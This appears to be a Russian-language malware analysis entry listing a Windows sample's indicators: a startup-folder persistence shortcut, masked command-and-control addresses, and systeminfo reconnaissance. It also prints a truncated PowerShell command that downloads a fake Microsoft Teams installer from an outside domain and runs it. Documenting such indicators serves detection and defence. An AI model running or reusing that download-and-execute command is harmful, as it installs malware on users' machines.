Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\thrndfg.lnk
- '12#.#40.55.152':443
- '38.##2.122.155':443
- '15#.65.0.17':443
- '12#.#40.55.152':443
- '38.##2.122.155':443
- '15#.65.0.17':443
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MSTeamsSetup.exe\" -OutFile \"$env:TMP/MSTeamsSetup.exe\" ; & \"$env:TMP/MSTeamsSetup.exe\" ; $startupFolder = [System.IO.Path]::Com...
- '<SYSTEM32>\cmd.exe' /c systeminfo
- '<SYSTEM32>\systeminfo.exe'